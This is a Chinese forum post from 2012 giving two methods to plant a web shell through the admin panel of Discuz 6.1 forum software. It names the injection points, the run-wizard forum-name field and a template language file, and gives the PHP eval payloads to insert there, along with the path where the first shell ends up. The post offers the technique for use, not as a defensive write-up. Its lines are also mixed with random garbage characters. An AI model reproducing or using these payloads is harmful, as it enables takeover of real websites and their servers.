discuz6.1两种方法后台拿shell2 f* ?4 U! s3 n4 E l
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
9 {6 B/ K% V: t1:
* ?! J( c+ M( u8 ^, D; Q. g+ @9 Ahttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
' {7 u( ?% @* v9 Ladmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell( l( f6 \% d& P4 c. s
<?php eval($_POST[cmd]);?>
9 T& F5 B% W! g* @& c" u后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php" L% n- Z/ n$ q) M+ Q4 H
* X. O3 S5 |% f
- H7 V0 h% l* @) R6 S6 X! E
2:后台模板管理--默认模板套系--详情
) L5 m3 _* ^- S5 F3 m E9 ltemplates/default/actions.lang.php
' W4 T' Q( t" I& a+ |# Jjhackj\\');eval($_POST[cmd])?>;//
8 b4 S) y) \5 B: Y
4 o$ b4 E0 s+ f: ~1 b! {4 D利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对